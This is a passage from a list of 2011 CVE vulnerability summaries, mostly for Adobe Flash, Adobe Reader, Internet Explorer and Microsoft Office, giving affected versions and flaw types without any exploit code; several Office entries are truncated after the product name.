CVE-2011-2460. [CVE-2011-2458] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, when Internet Explorer is used, allows remote attackers to bypass the cross-domain policy via a crafted web site. [CVE-2011-2457] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2456] Buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2455] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2454] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2453] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2452] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2451] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2450] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-2445] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2444] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011. [CVE-2011-2430] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via crafted streaming media, related to a "logic error vulnerability." [CVE-2011-2429] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, related to a "security control bypass." [CVE-2011-2428] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service (browser crash) via unspecified vectors, related to a "logic error issue." [CVE-2011-2427] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service via unspecified vectors. [CVE-2011-2426] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2425] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2417. [CVE-2011-2424] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted SWF file, as demonstrated by "about 400 unique crash signatures." [CVE-2011-2417] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2425. [CVE-2011-2416] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2138. [CVE-2011-2415] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2414. [CVE-2011-2414] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415. [CVE-2011-2383] Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release. [CVE-2011-2382] Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue. [CVE-2011-2300] Unspecified vulnerability in Oracle VM VirtualBox 4.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Guest Additions for Windows. [CVE-2011-2143] IBM Datacap Taskmaster Capture 8.0.1 before FP1, when Windows Authentication is enabled, allows remote attackers to obtain login access by using an incorrect password in conjunction with an account name from a different domain. [CVE-2011-2140] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2139] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers bypass the Same Origin Policy and obtain sensitive information via unspecified vectors. [CVE-2011-2138] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2416. [CVE-2011-2137] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2136] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2138 and CVE-2011-2416. [CVE-2011-2135] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2140, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2134] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2130] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2134, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2110] Adobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.23 and earlier on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in June 2011. [CVE-2011-2107] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.181.22 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.22 and earlier on Android, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "universal cross-site scripting vulnerability." [CVE-2011-2105] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted font data. [CVE-2011-2104] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2103] Adobe Reader and Acrobat 8.x before 8.3 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2102] Unspecified vulnerability in Adobe Reader and Acrobat before 10.1 on Windows and Mac OS X allows attackers to bypass intended access restrictions via unknown vectors. [CVE-2011-2101] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X do not properly restrict script, which allows attackers to execute arbitrary code via a crafted document, related to a "cross document script execution vulnerability." [CVE-2011-2100] Untrusted search path vulnerability in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2011-2099] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2098. [CVE-2011-2098] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2099. [CVE-2011-2097] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2095. [CVE-2011-2096] Heap-based buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2095] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2097. [CVE-2011-2094] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2095 and CVE-2011-2097. [CVE-2011-2075] Unspecified vulnerability in Google Chrome 11.0.696.65 on Windows 7 SP1 allows remote attackers to execute arbitrary code via unknown vectors. NOTE: as of 20110510, the only disclosure is a vague advisory that possibly relates to multiple vulnerabilities or multiple products. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2011-2041] The Start Before Logon (SBL) functionality in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.254 on Windows, and on Windows Mobile, allows local users to gain privileges via unspecified user-interface interaction, aka Bug ID CSCta40556. [CVE-2011-2039] The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904. [CVE-2011-2012] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 does not properly validate session cookies, which allows remote attackers to cause a denial of service (IIS outage) via unspecified network traffic, aka "Null Session Cookie Crash." [CVE-2011-2010] The Microsoft Office Input Method Editor (IME) for Simplified Chinese in Microsoft Pinyin IME 2010, Office Pinyin SimpleFast Style 2010, and Office Pinyin New Experience Style 2010 does not properly restrict access to configuration options, which allows local users to gain privileges via the Microsoft Pinyin (aka MSPY) IME toolbar, aka "Pinyin IME Elevation Vulnerability." [CVE-2011-2008] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability." [CVE-2011-2007] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Endless Loop DoS in snabase.exe Vulnerability." [CVE-2011-2001] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted access to a virtual function table after corruption of this table has occurred, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2011-2000] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability." [CVE-2011-1999] Microsoft Internet Explorer 8 does not properly allocate and access memory, which allows remote attackers to execute arbitrary code via vectors involving a "dereferenced memory address," aka "Select Element Remote Code Execution Vulnerability." [CVE-2011-1998] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "Jscript9.dll Remote Code Execution Vulnerability." [CVE-2011-1997] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnLoad Event Remote Code Execution Vulnerability." [CVE-2011-1996] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Option Element Remote Code Execution Vulnerability." [CVE-2011-1995] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "OLEAuto32.dll Remote Code Execution Vulnerability." [CVE-2011-1993] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Scroll Event Remote Code Execution Vulnerability." [CVE-2011-1992] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to read content from a different (1) domain or (2) zone via a "trial and error" attack, aka "XSS Filter Information Disclosure Vulnerability." [CVE-2011-1990] Microsoft Excel 2007 SP2 [CVE-2011-1989] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1988] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1987] Array index error in Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1986] Use-after-free vulnerability in Microsoft Excel 2003 SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Use after Free WriteAV Vulnerability." [CVE-2011-1983] Use-after-free vulnerability in Microsoft Office 2007 SP2 and SP3, Office 2010 Gold and SP1, and Office for Mac 2011 allows remote attackers to execute arbitrary code via a crafted Word document, aka "Word Use After Free Vulnerability." [CVE-2011-1982] Microsoft Office 2007 SP2, and 2010 Gold and SP1, does not initialize an unspecified object pointer during the opening of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Office Uninitialized Object Pointer Vulnerability." [CVE-2011-1980] Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-1979] Microsoft Visio 2003 SP3 and 2007 SP2 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "Move Around the Block RCE Vulnerability." [CVE-2011-1978] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4 does not properly validate the System.Net.Sockets trust level, which allows remote attackers to obtain sensitive information or trigger arbitrary outbound network traffic via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Socket Restriction Bypass Vulnerability." [CVE-2011-1977] The ASP.NET Chart controls in Microsoft .NET Framework 4, and Chart Control for Microsoft .NET Framework 3.5 SP1, do not properly verify functions in URIs, which allows remote attackers to read arbitrary files via special characters in a URI in an HTTP request, aka "Chart Control Information Disclosure Vulnerability." [CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability." [CVE-2011-1972] Microsoft Visio 2003 SP3, 2007 SP2, and 2010 Gold and SP1 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "pStream Release RCE Vulnerability." [CVE-2011-1969] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 provides the MicrosoftClient.jar file containing a signed Java applet, which allows remote attackers to execute arbitrary code on client machines via unspecified vectors, aka "Poisoned Cup of Code Execution Vulnerability." [CVE-2011-1964] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Style Object Memory Corruption Vulnerability." [CVE-2011-1963] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "XSLT Memory Corruption Vulnerability." [CVE-2011-1962] Microsoft Internet Explorer 6 through 9 does not properly handle unspecified character sequences, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers "inactive filtering," aka "Shift JIS Character Encoding Vulnerability." [CVE-2011-1961] The telnet URI handler in Microsoft Internet Explorer 6 through 9 does not properly launch the handler application, which allows remote attackers to execute arbitrary programs via a crafted web site, aka "Telnet Handler Remote Code Execution Vulnerability." [CVE-2011-1960] Microsoft Internet Explorer 6 through 9 does not properly implement JavaScript event handlers, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Event Handlers Information Disclosure Vulnerability." [CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability." [CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability." [CVE-2011-1895] CRLF injection vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary HTTP headers, and conduct HTTP response splitting attacks and cross-site scripting (XSS) attacks, via unspecified vectors, aka "ExcelTable Response Splitting XSS Vulnerability." [CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability." [CVE-2011-1889] The NSPLookupServiceNext function in the client in Microsoft Forefront Threat Management Gateway (TMG) 2010 allows remote attackers to execute arbitrary code via vectors involving unspecified requests, aka "TMG Firewall Client Memory Corruption Vulnerability." [CVE-2011-1847] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly enforce privilege requirements for table access, which allows remote authenticated users to modify SYSSTAT.TABLES statistics columns via an UPDATE statement. NOTE: some of these details are obtained from third party information. [CVE-2011-1846] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly revoke role membership from groups, which allows remote authenticated users to execute non-DDL statements by leveraging previous inherited possession of a role, a different vulnerability than CVE-2011-0757. NOTE: some of these details are obtained from third party information. [CVE-2011-1845] Multiple memory leaks in the DataGrid control implementation in Microsoft Silverlight 4 before 4.0.60310.0 allow remote attackers to cause a denial of service (memory consumption) via an application involving (1) subscriptions to an INotifyDataErrorInfo.ErrorsChanged event or (2) a TextBlock or TextBox element. [CVE-2011-1844] Memory leak in Microsoft Silverlight 4 before 4.0.60310.0 allows remote attackers to cause a denial of service (memory consumption) via an application involving a popup control and a custom DependencyProperty property, related to lack of garbage collection. [CVE-2011-1821] IBM Tivoli Directory Server (TDS) 5.2 before 5.2.0.5-TIV-ITDS-IF0010 on Windows allows remote authenticated users to cause a denial of service (daemon hang) via a cn=changelog search. [CVE-2011-1592] The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x before 1.4.5 on Windows uses an incorrect integer data type during decoding of SETCLIENTID calls, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file. [CVE-2011-1508] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, does not properly manage memory allocations for function pointers, which allows user-assisted remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Function Pointer Overwrite Vulnerability." [CVE-2011-1417] Integer overflow in QuickLook, as used in Apple Mac OS X before 10.6.7 and MobileSafari in Apple iOS before 4.2.7 and 4.3.x before 4.3.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a Microsoft Office document with a crafted size field in the OfficeArtMetafileHeader, related to OfficeArtBlip, as demonstrated on the iPhone by Charlie Miller and Dion Blazakis during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1353] Unspecified vulnerability in Adobe Reader 10.x before 10.1.1 on Windows allows local users to gain privileges via unknown vectors. [CVE-2011-1345] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, as demonstrated by Stephen Fewer as the first of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011, aka "Object Management Memory Corruption Vulnerability." [CVE-2011-1300] The Program::getActiveUniformMaxLength function in libGLESv2/Program.cpp in libGLESv2.dll in the WebGLES library in Almost Native Graphics Layer Engine (ANGLE), as used in Mozilla Firefox 4.x before 4.0.1 on Windows and in the GPU process in Google Chrome before 10.0.648.205 on Windows, allows remote attackers to execute arbitrary code via unspecified vectors, related to an "off-by-three" error. [CVE-2011-1280] The XML Editor in Microsoft InfoPath 2007 SP2 and 2010 [CVE-2011-1279] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Out of Bounds WriteAV Vulnerability." [CVE-2011-1278] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel WriteAV Vulnerability." [CVE-2011-1277] Microsoft Excel 2002 SP3, Office 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Memory Corruption Vulnerability." [CVE-2011-1276] Buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1275] Microsoft Excel 2002 SP3 [CVE-2011-1274] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1273] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-1272] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1271] The JIT compiler in Microsoft .NET Framework 3.5 Gold and SP1, 3.5.1, and 4.0, when IsJITOptimizerDisabled is false, does not properly handle expressions related to null strings, which allows context-dependent attackers to bypass intended access restrictions, and consequently execute arbitrary code, in opportunistic circumstances by leveraging a crafted application, as demonstrated by (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework JIT Optimization Vulnerability." [CVE-2011-1270] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Presentation Buffer Overrun RCE Vulnerability." [CVE-2011-1269] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1266] The Vector Markup Language (VML) implementation in vgx.dll in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "VML Memory Corruption Vulnerability." [CVE-2011-1262] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "HTTP Redirect Memory Corruption Vulnerability." [CVE-2011-1261] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Selection Object Memory Corruption Vulnerability." [CVE-2011-1260] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2011-1258] Microsoft Internet Explorer 6 through 8 does not properly restrict web script, which allows user-assisted remote attackers to obtain sensitive information from a different (1) domain or (2) zone via vectors involving a drag-and-drop operation, aka "Drag and Drop Information Disclosure Vulnerability." [CVE-2011-1257] Race condition in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors involving access to an object, aka "Window Open Race Condition Vulnerability." [CVE-2011-1256] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Modification Memory Corruption Vulnerability." [CVE-2011-1255] The Timed Interactive Multimedia Extensions (aka HTML+TIME) implementation in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." [CVE-2011-1254] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka 